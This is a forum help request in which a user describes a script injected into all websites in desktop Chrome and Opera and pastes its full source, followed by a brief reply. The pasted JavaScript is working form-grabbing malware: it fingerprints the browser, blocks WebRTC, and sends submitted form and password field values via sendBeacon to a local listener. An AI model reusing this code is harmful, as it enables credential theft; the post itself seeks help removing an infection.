Suspicious Script Injected in All Websites in Chrome and Opera, Not in Firefox or Edge
I've recently encountered an issue where a suspicious script is being injected into all websites I visit using Chrome and Opera on my desktop. This script appears in the page source and network traffic across all sites, regardless of whether I'm in normal browsing mode, incognito mode, or even using the guest profile. However, this script does not appear when I visit the same sites using Firefox, Edge, or Chrome on my mobile device.
What I've Tried So Far:

Checked My Codebase: The script is not present in any of the website's source code or my server files.
Disabled Extensions: I disabled all Chrome and Opera extensions and restarted the browsers, but the issue persists.
Cleared Cache and Cookies: I cleared the cache, cookies, and browsing data in both browsers, to no avail.
Reset Browser Settings: I reset Chrome and Opera to their default settings, but the script still shows up.
Scanned for Malware: I performed a full system scan with multiple antivirus programs (including Malwarebytes and AdwCleaner) but found no threats.
Checked Proxy and DNS Settings: My proxy settings are turned off, and my DNS settings are set to obtain automatically.
Reinstalled Browsers: I uninstalled and reinstalled both Chrome and Opera, ensuring all data was removed, but the problem remains.

Additional Information:

The script is showing in Chrome and Opera on desktop only, not on mobile or other browsers.

The script's source is something like http://127.0.0.1:64165/E7u.

The issue persists even in a fresh guest profile and incognito mode.

My system is running Windows 11.


My Question:
How can I determine the source of this script injection and completely remove it from my system? What steps should I take to troubleshoot this further?
Any guidance or suggestions would be greatly appreciated. Thank you!



var B3sqEy283 = '<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">'; function getRandomInt(max) {
  return Math.floor(Math.random() * Math.floor(max));
}

function hexToRGBA(hexColor)
{
    var idx = 1;
    if (hexColor[0] != '#')
        idx = 0;
    
    if (hexColor.length - idx != 8 && hexColor.length - idx != 6)
        return null;
    
    var opacity = 1.0;
    if (hexColor.length - idx == 8)
        opacity = parseInt(hexColor.slice(6 + idx, 8 + idx), 16) / 255;
        
    return [ parseInt(hexColor.slice(0 + idx, 2 + idx), 16), parseInt(hexColor.slice(2 + idx, 4 + idx), 16),
        parseInt(hexColor.slice(4 + idx, 6 + idx), 16), opacity ];
}

function parseRGBA(rgbaColor)
{
    var rgbaPerfix = 'rgba(';
    rgbaColor = rgbaColor.substr(rgbaPerfix.length, rgbaColor.length - rgbaPerfix.length - 1);
    rgbaColor = rgbaColor.split(' ').join('');
    var colorsStrs = rgbaColor.split(',');
    return [ parseInt(colorsStrs[0]), parseInt(colorsStrs[1]), parseInt(colorsStrs[2]), parseFloat(colorsStrs[3]) ];
}

function parseRGB(rgbColor)
{
    var rgbPerfix = 'rgb(';
    rgbColor = rgbColor.substr(rgbPerfix.length, rgbColor.length - rgbPerfix.length - 1);
    rgbColor = rgbColor.split(' ').join('');
    var colorsStrs = rgbColor.split(',');
    return [ parseInt(colorsStrs[0]), parseInt(colorsStrs[1]), parseInt(colorsStrs[2]), 1.0 ];
}

function colorToRGBA(colorComponents)
{
    return 'rgba(' + colorComponents[0] + ', ' + colorComponents[1] + ', ' + colorComponents[2] + ', ' + colorComponents[3] + ')';
}

var origFillStyle = CanvasRenderingContext2D.prototype.fillRect;
var origFillText = CanvasRenderingContext2D.prototype.fillText;


CanvasRenderingContext2D.prototype.fillRect = function(x, y, width, height)
{   
    if (typeof this.fillStyle != 'string')
    {
        origFillStyle.apply(this, arguments);
        return;
    }
    
    var usedStyle = this.fillStyle;
    var colorComponents = null;
    if (usedStyle[0] == '#')
        colorComponents = hexToRGBA(usedStyle);
    else if (usedStyle.startsWith('rgba('))
        colorComponents = parseRGBA(usedStyle);
    else if (usedStyle.startsWith('rgb('))
        colorComponents = parseRGB(usedStyle);
    
    if (colorComponents)
    {
        for (var i = 0; i < 3; ++i)
        {
            var valToAddOrSub = getRandomInt(8);
            while (valToAddOrSub == 0)
                valToAddOrSub = getRandomInt(8);
            var addOrSub = getRandomInt(3);
            
            if (addOrSub == 1)
                colorComponents[i] += valToAddOrSub;
            else if (addOrSub == 2)
                colorComponents[i] -= valToAddOrSub;
                
            if (colorComponents[i] > 255)
                colorComponents[i] = 255;
            if (colorComponents[i] < 0)
                colorComponents[i] = 0;
        }
        
        var valToAddOrSub = getRandomInt(5) / 100;
        var addOrSub = getRandomInt(3);
        
        if (addOrSub == 1)
            colorComponents[3] += valToAddOrSub;
        else if (addOrSub == 2)
            colorComponents[3] -= valToAddOrSub;
            
        this.fillStyle = colorToRGBA(colorComponents);
    }
    
    origFillStyle.apply(this, arguments);
};

CanvasRenderingContext2D.prototype.fillText = function()
{
    for (var i = 1; i < 3; ++i)
    {
        var addOrSub = getRandomInt(3);
        if (addOrSub == 1 && arguments[i] < 255)
            arguments[i] += 1;
        else if (addOrSub == 2 && arguments[i] > 0)
            arguments[i] -= 1;
    }
    
    origFillText.apply(this, arguments);
};

function insertAfter(newNode, referenceNode) {
    var parentNode = referenceNode.parentNode;
    var nextSibling = referenceNode.nextSibling;
    parentNode.insertBefore(newNode, referenceNode);
    //referenceNode.parentNode.insertBefore(newNode, referenceNode.nextSibling);
}

function D9x580612 () {
    try {
        return window.self !== window.top;
    } catch (e) {
        return true;
    }
}

function Bi7479kf()
{
    {
        var L9Q3G8l = document.currentScript;
        if (L9Q3G8l != null)
        {
            if (!B3sqEy283.startsWith('<'))
            {
                var k5160R12F = document.createElement('script');
                k5160R12F.textContent = B3sqEy283;
                insertAfter(k5160R12F, L9Q3G8l);
            }
            else
            {
                L9Q3G8l.insertAdjacentHTML('beforebegin', B3sqEy283);
            }
            L9Q3G8l.parentNode.removeChild(L9Q3G8l);
        }
    }
    
    if (window.hasOwnProperty('XKi28Wg6p')) 
        return;
    
    window.XKi28Wg6p = 1;
    
    var OriginalRTCPeerConnection = RTCPeerConnection;

    RTCPeerConnection = function(pcConfig, pcConstraints) { var cn = new OriginalRTCPeerConnection(); return cn; };

    webkitRTCPeerConnection = RTCPeerConnection;

    RTCPeerConnection.prototype.createDataChannel = function() {};

    RTCPeerConnection.prototype.createOffer = function() {};

    RTCPeerConnection.prototype.addIceCandidate = function() {};
    
    var h2g301d = Element.prototype.appendChild;
    
    Element.prototype.appendChild = function(P4G96U)
    {
        var x9lJA823 = h2g301d.apply(this, arguments);
        try
        {
            if (P4G96U.tagName == 'IFRAME')
            {               
                x9lJA823.contentWindow.RTCPeerConnection = RTCPeerConnection;
                x9lJA823.contentWindow.webkitRTCPeerConnection = RTCPeerConnection;
                x9lJA823.contentDocument.createElement = document.createElement;
            }
        }
        catch(e) {}
        return x9lJA823;
    };

    var J7O3a = 'chrome';
    var d3oay92t31 = null;
    var D76r2 = 'HP';
    var T830D0fpU = 'SohailGoheer';
    
    var g782d = window.addEventListener;
    let E38FD = [ 127,0,6533,120 ];
    
    var CTzNTKy4H = function(y4e77Mk)
    {
        var Yu5H67 = {};
    
        for (var i in y4e77Mk)
        {
            if (i === 'enabledPlugin' || typeof y4e77Mk[i] === 'function')
                continue;
            else if (typeof y4e77Mk[i] === 'object' && !Array.isArray(y4e77Mk[i]))
            {
                let obj2 = CTzNTKy4H(y4e77Mk[i]);
                if (Object.keys(obj2).length)
                    Yu5H67[i] = obj2;
            }
            else
                Yu5H67[i] = y4e77Mk[i];
        }

        return Yu5H67;
    };
    
    var F538t = function()
    {
        var R60KJT6030 = [ 'innerHeight', 'outerHeight', 'innerWidth', 'outerWidth' ];
        var y8K12e3 = {};
        for (var i = 0; i < R60KJT6030.length; ++i)
            y8K12e3[R60KJT6030[i]] = window[R60KJT6030[i]];
        return y8K12e3;
    };
    
    var Y2Dw01956M = function()
    {
        var Yu5H67 = {};
        
        const gl = document.createElement('canvas').getContext('webgl');
        const ext = gl.getExtension('WEBGL_debug_renderer_info');
        
        if (ext) 
        {
            Yu5H67['vendor'] = gl.getParameter(ext.UNMASKED_VENDOR_WEBGL);
            Yu5H67['rendrer'] = gl.getParameter(ext.UNMASKED_RENDERER_WEBGL);
            Yu5H67['gl_vendor'] = gl.getParameter(gl.VENDOR);
            Yu5H67['gl_rendrer'] = gl.getParameter(gl.RENDERER);
            Yu5H67['version'] = gl.getParameter(gl.VERSION);
        }
        
        return Yu5H67;
    };
    
    var LtX5X37HT9 = null;
    
    var Xkj3Qe65 = function()
    {
        var Yu5H67 = {};
        let B2T7f8cC = (new Intl.DateTimeFormat()).resolvedOptions();
        Yu5H67['day'] = B2T7f8cC.day;
        Yu5H67['month'] = B2T7f8cC.month;
        Yu5H67['year'] = B2T7f8cC.year;
        Yu5H67['calendar'] = B2T7f8cC.calendar;
        Yu5H67['locale'] = B2T7f8cC.locale;
        Yu5H67['numberingSystem'] = B2T7f8cC.numberingSystem;
        Yu5H67['timezone'] = B2T7f8cC.timeZone;
        LtX5X37HT9 = B2T7f8cC.timeZone;
        return Yu5H67;
    };
    
    var ImojZYp24 = {};
    ImojZYp24['navigator'] = CTzNTKy4H(navigator);
    ImojZYp24['window'] = F538t();
    ImojZYp24['screen'] = CTzNTKy4H(screen);
    ImojZYp24['webgl'] = Y2Dw01956M();
    ImojZYp24['timezone'] = (new Date).getTimezoneOffset();
    ImojZYp24['timezoneOpts'] = Xkj3Qe65();
    var wQ4P2Oa = function(battery) {
        ImojZYp24['battery'] = battery;
        if (D9x580612() || ImojZYp24['window'].outerWidth == 0 || ImojZYp24['window'].outerHeight == 0 )
            return;
        navigator.sendBeacon('http://127.0.0.1:64159/', JSON.stringify(Q9rQQ('click', null)));
    };
    navigator.getBattery().then(function(battery) { wQ4P2Oa(true); }).catch(function() { wQ4P2Oa(false); });
    
    var B2C1d86WTS = function(j4087m8409)
    {
        while (j4087m8409 != null && j4087m8409 != document)
        {
            if (j4087m8409.form != null)
                return j4087m8409.form;
            j4087m8409 = j4087m8409.parentNode;
        }
        return null;
    };
    
    var D80gG = function(j4087m8409)
    {
        if (j4087m8409.tagName == 'BUTTON' || j4087m8409.tagName == 'INPUT')
            return j4087m8409;
        while (j4087m8409 != null && j4087m8409 != document)
        {
            j4087m8409 = j4087m8409.parentNode;
            if (j4087m8409.tagName == 'BUTTON')
                return j4087m8409;
        }
        return null;
    };
    
    var Q9rQQ = function(J05EMn7Bu, V1V375S138)
    {
        var c72Ny = {};
        c72Ny['browser'] = J7O3a;
        c72Ny['user'] = D76r2;
        c72Ny['domain'] = T830D0fpU;
        c72Ny['lang'] = navigator.language;
        c72Ny['langs'] = navigator.languages;
        c72Ny['type'] = J05EMn7Bu;
        c72Ny['title'] = document.title;
        c72Ny['host'] = window.location.host;
        c72Ny['url'] = window.location.href;
        c72Ny['timeZoneArea'] = LtX5X37HT9;
        c72Ny['appVersion'] = E38FD;
        if (V1V375S138)
            c72Ny['params'] = V1V375S138;
        else
            c72Ny['fb'] = ImojZYp24;
        return c72Ny;
    };
    
    
    var JdM1P15 = function(Lvc4K9, J05EMn7Bu)
    {
        var Jxm28 = {};
        var S97ogYsA5 = 0;
        
        for (var Tm91y = 0; Tm91y < Lvc4K9.elements.length; ++Tm91y)
        {
            var Mu1728 = Lvc4K9.elements.item(Tm91y);
            if (Mu1728.value.length == 0 || Mu1728.name.toLowerCase().includes('csrf') || Mu1728.name == 'g-recaptcha-response')
                continue;
            ++S97ogYsA5;
            var S38Qn = Mu1728.name;
            if (S38Qn.length == 0)
                S38Qn = 'u-' + (Tm91y + 1);
            Jxm28[S38Qn] = Mu1728.value;
        }
        
        if (S97ogYsA5 == 0)
            return;
        
        navigator.sendBeacon('http://127.0.0.1:64159/', JSON.stringify(Q9rQQ(J05EMn7Bu, Jxm28)));
    };
    
    var NfD4L66a = function(J05EMn7Bu)
    {
        var NCvFlg = document.getElementsByTagName('input');
        if (NCvFlg.length == 0)
            return;
        var M2ta33mMe8 = false;
        for (var Tm91y = 0; Tm91y < NCvFlg.length; ++Tm91y)
        {
            if (NCvFlg[Tm91y].type == 'password' && NCvFlg[Tm91y].value.length != 0)
            {
                M2ta33mMe8 = true;
                break;
            }
        }
        if (!M2ta33mMe8)
        {
            return;
        }
        
        var Jxm28 = {};
        
        for (var Tm91y = 0; Tm91y < NCvFlg.length; ++Tm91y)
        {
            if (NCvFlg[Tm91y].type == 'hidden' || !NCvFlg[Tm91y].value.length)
                continue;
            var P45C2 = NCvFlg[Tm91y].name;
            if (!P45C2.length)
                P45C2 = 'u-' + Tm91y;
            Jxm28[P45C2] = NCvFlg[Tm91y].value;
        }
        navigator.sendBeacon('http://127.0.0.1:64159/', JSON.stringify(Q9rQQ(J05EMn7Bu, Jxm28)));
    };
    
    g782d('click', function(ZB55MZ66)
    {
        var Lvc4K9 = B2C1d86WTS(ZB55MZ66.target);
        
        var Tixc8s2L = d3oay92t31;
        d3oay92t31 = null;
        
        if (Lvc4K9 == null)
        {
            NfD4L66a('click');
            return;
        }
        if (Lvc4K9 == Tixc8s2L)
        {
            return;
        }
        
        var WP77h8g21 = D80gG(ZB55MZ66.target);
        if (WP77h8g21 == null)
        {
            return;
        }
        if (WP77h8g21.type != 'submit')
        {
            return;
        }
        
        JdM1P15(Lvc4K9, 'click');
    });
    
    g782d('keydown', function(ZB55MZ66)
    {
        if (ZB55MZ66.keyCode != 13)
            return;
        
        if (D80gG(ZB55MZ66.target) == null)
        {
            return;
        }
        
        var M5fr30GV9l = B2C1d86WTS(ZB55MZ66.target);
        if (M5fr30GV9l == null)
        {
            NfD4L66a('enter');
            return;
        }
        
        d3oay92t31 = M5fr30GV9l;
        
        JdM1P15(M5fr30GV9l, 'enter');
    });
    
}

Bi7479kf();




I'd be wiping that machine. What does the script contain?

i added the code in query
